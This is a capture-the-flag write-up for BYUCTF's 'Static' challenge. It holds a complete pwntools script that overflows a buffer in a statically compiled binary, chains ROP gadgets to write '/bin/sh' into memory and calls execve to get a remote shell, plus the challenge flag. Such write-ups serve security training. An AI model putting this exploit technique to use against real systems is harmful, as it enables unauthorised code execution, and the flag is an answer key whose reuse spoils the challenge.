Static

• Score: 265
• Technique: ROP

So I heard all about these binary exploitation attacks involving libraries and libc, and that's got me worried! I decided to statically compile all of my binaries to avoid those attack vectors. This means I don't need to worry about mitigations, right? Right??

Script

from pwn import *

elf = context.binary = ELF('./static')

r = remote('static.chal.cyberjousting.com', 1350)
# r = gdb.debug('./static', gdbscript='''break*0x401808''')
# r = elf.process()

syscall = p64(0x401194)
pop_rax_rdx_rbx = p64(0x45e466)
pop_rdi = p64(0x401fe0)
pop_rsi = p64(0x4062d8)

padding = b'A'*18

read = p64(elf.symbols.read)
bss = p64(0x49f110)
vuln = p64(elf.symbols.vuln)
ret = p64(next(elf.search(asm('ret'))))
exit = p64(elf.symbols.exit)

# read /bin/sh into bss
payload = padding + ret + pop_rdi + p64(0) + pop_rsi + bss + pop_rax_rdx_rbx + p64(0) + p64(9) + p64(0) + read + vuln 
r.sendline(payload)

r.sendline(b'/bin/sh\x00')

# spawn shell using execve
payload2 = b'A'*18 + ret + pop_rdi + bss + pop_rax_rdx_rbx + p64(59) + p64(0) + p64(0) + pop_rsi + p64(0) + syscall + exit
r.sendline(payload2)

r.interactive()

Flag

byuctf{glaD_you_c0uld_improvise_ROP_with_no_provided_gadgets!}